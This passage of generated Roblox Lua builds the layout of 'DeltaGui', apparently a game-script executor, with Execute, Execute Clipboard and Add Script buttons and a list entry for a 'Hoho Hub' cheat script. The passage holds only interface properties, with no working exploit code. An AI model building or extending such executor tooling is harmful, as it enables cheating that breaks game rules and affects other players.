NumberSequence.new{NumberSequenceKeypoint.new(0.000, 0),NumberSequenceKeypoint.new(0.931, 0),NumberSequenceKeypoint.new(1.000, 1)}; G2L["77"]["Name"] = [[BottomFade]]; G2L["77"]["Rotation"] = 90; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left.Lines G2L["78"] = Instance.new("TextLabel", G2L["75"]); G2L["78"]["TextYAlignment"] = Enum.TextYAlignment.Top; G2L["78"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["78"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["78"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["78"]["TextSize"] = 17; G2L["78"]["TextColor3"] = Color3.fromRGB(242, 242, 242); G2L["78"]["AutomaticSize"] = Enum.AutomaticSize.X; G2L["78"]["Size"] = UDim2.new(1, -5, 1, -7); G2L["78"]["Text"] = [[1]]; G2L["78"]["Name"] = [[Lines]]; G2L["78"]["BackgroundTransparency"] = 0.9990000128746033; G2L["78"]["Position"] = UDim2.new(0, 5, 0, 7); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left.Lines.BottomFade G2L["79"] = Instance.new("UIGradient", G2L["78"]); G2L["79"]["Transparency"] = NumberSequence.new{NumberSequenceKeypoint.new(0.000, 0),NumberSequenceKeypoint.new(0.931, 0),NumberSequenceKeypoint.new(1.000, 1)}; G2L["79"]["Name"] = [[BottomFade]]; G2L["79"]["Rotation"] = 90; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left.AdaptSize G2L["7a"] = Instance.new("LocalScript", G2L["75"]); G2L["7a"]["Name"] = [[AdaptSize]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left.BottomFade G2L["7b"] = Instance.new("UIGradient", G2L["75"]); G2L["7b"]["Transparency"] = NumberSequence.new{NumberSequenceKeypoint.new(0.000, 0),NumberSequenceKeypoint.new(0.931, 0),NumberSequenceKeypoint.new(1.000, 1)}; G2L["7b"]["Name"] = [[BottomFade]]; G2L["7b"]["Rotation"] = 90; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts G2L["7c"] = Instance.new("ScrollingFrame", G2L["47"]); G2L["7c"]["Active"] = true; G2L["7c"]["CanvasSize"] = UDim2.new(0, 0, 10, 0); G2L["7c"]["BackgroundColor3"] = Color3.fromRGB(20, 20, 23); G2L["7c"]["BackgroundTransparency"] = 1; G2L["7c"]["Size"] = UDim2.new(0.9701896905899048, 0, 0.8328530192375183, 0); G2L["7c"]["ScrollBarImageColor3"] = Color3.fromRGB(20, 20, 23); G2L["7c"]["BorderColor3"] = Color3.fromRGB(20, 20, 23); G2L["7c"]["Position"] = UDim2.new(0.02981029823422432, 0, 0.13256484270095825, 0); G2L["7c"]["Name"] = [[Scripts]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.ScriptFrame G2L["7d"] = Instance.new("Frame", G2L["7c"]); G2L["7d"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["7d"]["BackgroundTransparency"] = 1; G2L["7d"]["Size"] = UDim2.new(0.9900000095367432, 0, 1, 0); G2L["7d"]["Position"] = UDim2.new(0, 0, 0.011527378112077713, 0); G2L["7d"]["Name"] = [[ScriptFrame]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.ScriptFrame.UIListLayout G2L["7e"] = Instance.new("UIListLayout", G2L["7d"]); G2L["7e"]["SortOrder"] = Enum.SortOrder.LayoutOrder; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.Folder G2L["7f"] = Instance.new("Folder", G2L["7c"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST G2L["80"] = Instance.new("Frame", G2L["7c"]); G2L["80"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["80"]["BackgroundTransparency"] = 1; G2L["80"]["Size"] = UDim2.new(0.9800000190734863, 0, 0.03500000014901161, 0); G2L["80"]["Position"] = UDim2.new(-4.305284306838075e-08, 0, 5.496681776406831e-09, 0); G2L["80"]["Visible"] = false; G2L["80"]["Name"] = [[LIST]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.TitleScript G2L["81"] = Instance.new("Frame", G2L["80"]); G2L["81"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0); G2L["81"]["BackgroundTransparency"] = 0.33329999446868896; G2L["81"]["Size"] = UDim2.new(0.542340874671936, 0, 0.7513126134872437, 0); G2L["81"]["BorderColor3"] = Color3.fromRGB(15, 15, 17); G2L["81"]["Position"] = UDim2.new(-0.002550613135099411, 0, 0.110756054520607, 0); G2L["81"]["Name"] = [[TitleScript]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.TitleScript.UICorner G2L["82"] = Instance.new("UICorner", G2L["81"]); G2L["82"]["CornerRadius"] = UDim.new(0.38999998569488525, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.TitleScript.TextLabel G2L["83"] = Instance.new("TextLabel", G2L["81"]); G2L["83"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0); G2L["83"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["83"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal); G2L["83"]["TextSize"] = 13; G2L["83"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["83"]["Size"] = UDim2.new(0.9670000076293945, 0, 0.8320000171661377, 0); G2L["83"]["Text"] = [[Hoho Hub Script for BF]]; G2L["83"]["BackgroundTransparency"] = 1; G2L["83"]["Position"] = UDim2.new(0.01600000075995922, 0, 0.054999999701976776, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.TitleScript.TextLabel.UICorner G2L["84"] = Instance.new("UICorner", G2L["83"]); G2L["84"]["CornerRadius"] = UDim.new(0.38999998569488525, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.Execute G2L["85"] = Instance.new("Frame", G2L["80"]); G2L["85"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["85"]["Size"] = UDim2.new(0.20491595566272736, 0, 0.7415456175804138, 0); G2L["85"]["Position"] = UDim2.new(0.5597181916236877, 0, 0.1205231249332428, 0); G2L["85"]["Name"] = [[Execute]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.Execute.TextButton G2L["86"] = Instance.new("TextButton", G2L["85"]); G2L["86"]["TextWrapped"] = true; G2L["86"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["86"]["TextSize"] = 12; G2L["86"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["86"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["86"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["86"]["Text"] = [[Execute]]; G2L["86"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.Execute.TextButton.UICorner G2L["87"] = Instance.new("UICorner", G2L["86"]); G2L["87"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.Execute.UICorner G2L["88"] = Instance.new("UICorner", G2L["85"]); G2L["88"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.Execute.ImageLabel G2L["89"] = Instance.new("ImageLabel", G2L["85"]); G2L["89"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["89"]["Image"] = [[rbxassetid://12730588268]]; G2L["89"]["Size"] = UDim2.new(0.20393863320350647, 0, 0.7066323161125183, 0); G2L["89"]["BackgroundTransparency"] = 1; G2L["89"]["Position"] = UDim2.new(0.7205832004547119, 0, 0.14132645726203918, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.Delete G2L["8a"] = Instance.new("Frame", G2L["80"]); G2L["8a"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["8a"]["Size"] = UDim2.new(0.20491595566272736, 0, 0.7415456175804138, 0); G2L["8a"]["Position"] = UDim2.new(0.7835553884506226, 0, 0.1205231249332428, 0); G2L["8a"]["Name"] = [[Delete]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.Delete.TextButton G2L["8b"] = Instance.new("TextButton", G2L["8a"]); G2L["8b"]["TextWrapped"] = true; G2L["8b"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["8b"]["TextSize"] = 12; G2L["8b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["8b"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["8b"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["8b"]["Text"] = [[Delete]]; G2L["8b"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.Delete.TextButton.UICorner G2L["8c"] = Instance.new("UICorner", G2L["8b"]); G2L["8c"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.Delete.UICorner G2L["8d"] = Instance.new("UICorner", G2L["8a"]); G2L["8d"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.Delete.ImageLabel G2L["8e"] = Instance.new("ImageLabel", G2L["8a"]); G2L["8e"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["8e"]["Image"] = [[rbxassetid://12731675545]]; G2L["8e"]["Size"] = UDim2.new(0.20393863320350647, 0, 0.7066323161125183, 0); G2L["8e"]["BackgroundTransparency"] = 1; G2L["8e"]["Position"] = UDim2.new(0.640999972820282, 0, 0.14100000262260437, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.UIAspectRatioConstraint G2L["8f"] = Instance.new("UIAspectRatioConstraint", G2L["80"]); G2L["8f"]["AspectRatio"] = 14.29936695098877; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.AddScript1 G2L["90"] = Instance.new("Frame", G2L["47"]); G2L["90"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["90"]["Size"] = UDim2.new(0.19932666420936584, 0, 0.06368814408779144, 0); G2L["90"]["Position"] = UDim2.new(0.7670302391052246, 0, 0.017075123265385628, 0); G2L["90"]["Name"] = [[AddScript1]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.AddScript1.TextButton G2L["91"] = Instance.new("TextButton", G2L["90"]); G2L["91"]["TextWrapped"] = true; G2L["91"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["91"]["TextSize"] = 12; G2L["91"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["91"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["91"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["91"]["Text"] = [[Add Script]]; G2L["91"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.AddScript1.TextButton.UICorner G2L["92"] = Instance.new("UICorner", G2L["91"]); G2L["92"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.AddScript1.TextButton.LocalScript G2L["93"] = Instance.new("LocalScript", G2L["91"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.AddScript1.UICorner G2L["94"] = Instance.new("UICorner", G2L["90"]); G2L["94"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.AddScript1.ImageLabel G2L["95"] = Instance.new("ImageLabel", G2L["90"]); G2L["95"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["95"]["Image"] = [[rbxassetid://12731182145]]; G2L["95"]["Size"] = UDim2.new(0.20393863320350647, 0, 0.7066323161125183, 0); G2L["95"]["BackgroundTransparency"] = 1; G2L["95"]["Position"] = UDim2.new(0.7205832004547119, 0, 0.14132645726203918, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home G2L["96"] = Instance.new("Frame", G2L["46"]); G2L["96"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["96"]["BackgroundTransparency"] = 1; G2L["96"]["Size"] = UDim2.new(0.8833174705505371, 0, 0.9945666193962097, 0); G2L["96"]["Position"] = UDim2.new(0.11490308493375778, 0, 0.002866186201572418, 0); G2L["96"]["Visible"] = false; G2L["96"]["Name"] = [[Home]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox G2L["97"] = Instance.new("Frame", G2L["96"]); G2L["97"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0); G2L["97"]["BackgroundTransparency"] = 0.33329999446868896; G2L["97"]["Size"] = UDim2.new(0.9585282802581787, 0, 0.9365506768226624, 0); G2L["97"]["BorderColor3"] = Color3.fromRGB(15, 15, 17); G2L["97"]["Position"] = UDim2.new(0.023612210527062416, 0, 0.0383836105465889, 0); G2L["97"]["Name"] = [[ScriptTextbox]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.UICorner G2L["98"] = Instance.new("UICorner", G2L["97"]); G2L["98"]["CornerRadius"] = UDim.new(0.03999999910593033, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Execute G2L["99"] = Instance.new("Frame", G2L["97"]); G2L["99"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["99"]["Size"] = UDim2.new(0.2710147798061371, 0, 0.0753278136253357, 0); G2L["99"]["Position"] = UDim2.new(0.032752323895692825, 0, 0.8925735354423523, 0); G2L["99"]["Name"] = [[Execute]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Execute.TextButton G2L["9a"] = Instance.new("TextButton", G2L["99"]); G2L["9a"]["TextWrapped"] = true; G2L["9a"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["9a"]["TextSize"] = 12; G2L["9a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["9a"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["9a"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["9a"]["Text"] = [[Execute Text]]; G2L["9a"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Execute.TextButton.UICorner G2L["9b"] = Instance.new("UICorner", G2L["9a"]); G2L["9b"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Execute.TextButton.LocalScript G2L["9c"] = Instance.new("LocalScript", G2L["9a"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Execute.UICorner G2L["9d"] = Instance.new("UICorner", G2L["99"]); G2L["9d"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Execute.ImageLabel G2L["9e"] = Instance.new("ImageLabel", G2L["99"]); G2L["9e"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["9e"]["Image"] = [[rbxassetid://12731759847]]; G2L["9e"]["Size"] = UDim2.new(0.14605075120925903, 0, 0.6269142031669617, 0); G2L["9e"]["BackgroundTransparency"] = 1; G2L["9e"]["Position"] = UDim2.new(0.7229999899864197, 0, 0.17900000512599945, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Execute.ImageLabel.UIAspectRatioConstraint G2L["9f"] = Instance.new("UIAspectRatioConstraint", G2L["9e"]); G2L["9f"]["AspectRatio"] = 1.0000001192092896; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Clear G2L["a0"] = Instance.new("Frame", G2L["97"]); G2L["a0"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["a0"]["Size"] = UDim2.new(0.19932666420936584, 0, 0.0753278136253357, 0); G2L["a0"]["Position"] = UDim2.new(0.32880187034606934, 0, 0.8925735354423523, 0); G2L["a0"]["Name"] = [[Clear]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Clear.TextButton G2L["a1"] = Instance.new("TextButton", G2L["a0"]); G2L["a1"]["TextWrapped"] = true; G2L["a1"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["a1"]["TextSize"] = 12; G2L["a1"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["a1"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["a1"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["a1"]["Text"] = [[Clear]]; G2L["a1"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Clear.TextButton.UICorner G2L["a2"] = Instance.new("UICorner", G2L["a1"]); G2L["a2"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Clear.TextButton.LocalScript G2L["a3"] = Instance.new("LocalScript", G2L["a1"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Clear.UICorner G2L["a4"] = Instance.new("UICorner", G2L["a0"]); G2L["a4"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Clear.ImageLabel G2L["a5"] = Instance.new("ImageLabel", G2L["a0"]); G2L["a5"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["a5"]["Image"] = [[rbxassetid://12731778060]]; G2L["a5"]["Size"] = UDim2.new(0.1843939572572708, 0, 0.5821346640586853, 0); G2L["a5"]["BackgroundTransparency"] = 1; G2L["a5"]["Position"] = UDim2.new(0.6240000128746033, 0, 0.21400000154972076, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Clear.ImageLabel.UIAspectRatioConstraint G2L["a6"] = Instance.new("UIAspectRatioConstraint", G2L["a5"]); G2L["a6"]["AspectRatio"] = 1.0000001192092896; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.ExecuteClipboard G2L["a7"] = Instance.new("Frame", G2L["97"]); G2L["a7"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["a7"]["Size"] = UDim2.new(0.3159777522087097, 0, 0.0753278136253357, 0); G2L["a7"]["Position"] = UDim2.new(0.5501444339752197, 0, 0.8892003893852234, 0); G2L["a7"]["Name"] = [[ExecuteClipboard]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.ExecuteClipboard.TextButton G2L["a8"] = Instance.new("TextButton", G2L["a7"]); G2L["a8"]["TextWrapped"] = true; G2L["a8"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["a8"]["TextSize"] = 12; G2L["a8"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["a8"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["a8"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["a8"]["Text"] = [[Execute Clipboard]]; G2L["a8"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.ExecuteClipboard.TextButton.UICorner G2L["a9"] = Instance.new("UICorner", G2L["a8"]); G2L["a9"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.ExecuteClipboard.TextButton.LocalScript G2L["aa"] = Instance.new("LocalScript", G2L["a8"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.ExecuteClipboard.UICorner G2L["ab"] = Instance.new("UICorner", G2L["a7"]); G2L["ab"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.ExecuteClipboard.ImageLabel G2L["ac"] = Instance.new("ImageLabel", G2L["a7"]); G2L["ac"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["ac"]["Image"] = [[rbxassetid://12731907784]]; G2L["ac"]["Size"] = UDim2.new(0.11632032692432404, 0, 0.5821346640586853, 0); G2L["ac"]["BackgroundTransparency"] = 1; G2L["ac"]["Position"] = UDim2.new(0.7695035934448242, 0, 0.17911836504936218, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.ExecuteClipboard.ImageLabel.UIAspectRatioConstraint G2L["ad"] = Instance.new("UIAspectRatioConstraint", G2L["ac"]); G2L["ad"]["AspectRatio"] = 1.0000001192092896; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar G2L["ae"] = Instance.new("Frame", G2L["97"]); G2L["ae"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["ae"]["BackgroundTransparency"] = 1; G2L["ae"]["Size"] = UDim2.new(0.953382134437561, 0, 0.8380939960479736, 0); G2L["ae"]["Position"] = UDim2.new(0.025999952107667923, 0, 0.02475839853286743, 0); G2L["ae"]["Name"] = [[TextboxBar]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript G2L["af"] = Instance.new("LocalScript", G2L["ae"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor G2L["b0"] = Instance.new("ModuleScript", G2L["af"]); G2L["b0"]["Name"] = [[ScriptEditor]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Syntax G2L["b1"] = Instance.new("ModuleScript", G2L["b0"]); G2L["b1"]["Name"] = [[Syntax]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Theme G2L["b2"] = Instance.new("ModuleScript", G2L["b0"]); G2L["b2"]["Name"] = [[Theme]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.GetLines G2L["b3"] = Instance.new("ModuleScript", G2L["b0"]); G2L["b3"]["Name"] = [[GetLines]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.FakeEditor G2L["b4"] = Instance.new("ModuleScript", G2L["b0"]); G2L["b4"]["Name"] = [[FakeEditor]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.GetLine G2L["b5"] = Instance.new("ModuleScript", G2L["b0"]); G2L["b5"]["Name"] = [[GetLine]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.TweenLibrary G2L["b6"] = Instance.new("ModuleScript", G2L["b0"]); G2L["b6"]["Name"] = [[TweenLibrary]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.GetWord G2L["b7"] = Instance.new("ModuleScript", G2L["b0"]); G2L["b7"]["Name"] = [[GetWord]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Lexer G2L["b8"] = Instance.new("ModuleScript", G2L["b0"]); G2L["b8"]["Name"] = [[Lexer]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Suggestions G2L["b9"] = Instance.new("ModuleScript", G2L["b0"]); G2L["b9"]["Name"] = [[Suggestions]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Words G2L["ba"] = Instance.new("ModuleScript", G2L["b0"]); G2L["ba"]["Name"] = [[Words]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.TextFixer G2L["bb"] = Instance.new("ModuleScript", G2L["b0"]); G2L["bb"]["Name"] = [[TextFixer]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor G2L["bc"] = Instance.new("ImageLabel", G2L["b0"]); G2L["bc"]["BorderSizePixel"] = 0; G2L["bc"]["BackgroundColor3"] = Color3.fromRGB(35, 41, 35); G2L["bc"]["BackgroundTransparency"] = 1; G2L["bc"]["Size"] = UDim2.new(1, 0, 1, 0); G2L["bc"]["BorderColor3"] = Color3.fromRGB(28, 43, 54); G2L["bc"]["Name"] = [[Editor]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll G2L["bd"] = Instance.new("ScrollingFrame", G2L["bc"]); G2L["bd"]["Active"] = true; G2L["bd"]["CanvasSize"] = UDim2.new(0, 0, 0, 0); G2L["bd"]["ElasticBehavior"] = Enum.ElasticBehavior.Always; G2L["bd"]["TopImage"] = [[rbxasset://textures/ui/Scroll/scroll-middle.png]]; G2L["bd"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["bd"]["AutomaticCanvasSize"] = Enum.AutomaticSize.XY; G2L["bd"]["BackgroundTransparency"] = 0.9990000128746033; G2L["bd"]["Size"] = UDim2.new(1, 0, 1, 0); G2L["bd"]["ScrollBarImageColor3"] = Color3.fromRGB(64, 64, 64); G2L["bd"]["BorderColor3"] = Color3.fromRGB(53, 53, 53); G2L["bd"]["Name"] = [[Scroll]]; G2L["bd"]["BottomImage"] = [[rbxasset://textures/ui/Scroll/scroll-middle.png]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Source G2L["be"] = Instance.new("TextBox", G2L["bd"]); G2L["be"]["TextSize"] = 17; G2L["be"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["be"]["TextStrokeColor3"] = Color3.fromRGB(41, 41, 41); G2L["be"]["TextYAlignment"] = Enum.TextYAlignment.Top; G2L["be"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["be"]["TextColor3"] = Color3.fromRGB(239, 239, 239); G2L["be"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["be"]["MultiLine"] = true; G2L["be"]["BackgroundTransparency"] = 0.9990000128746033; G2L["be"]["Size"] = UDim2.new(1, -44, 1, -5); G2L["be"]["Text"] = [[]]; G2L["be"]["Position"] = UDim2.new(0, 44, 0, 5); G2L["be"]["AutomaticSize"] = Enum.AutomaticSize.XY; G2L["be"]["Name"] = [[Source]]; G2L["be"]["ClearTextOnFocus"] = false; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Source.LineHighlight G2L["bf"] = Instance.new("Frame", G2L["be"]); G2L["bf"]["BorderSizePixel"] = 0; G2L["bf"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["bf"]["AnchorPoint"] = Vector2.new(0, 0.5); G2L["bf"]["BackgroundTransparency"] = 0.9399999976158142; G2L["bf"]["Size"] = UDim2.new(1, 0, 0, 17); G2L["bf"]["Position"] = UDim2.new(0, -10, 0, 9); G2L["bf"]["Name"] = [[LineHighlight]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Source.Hidden G2L["c0"] = Instance.new("TextLabel", G2L["be"]); G2L["c0"]["BorderSizePixel"] = 0; 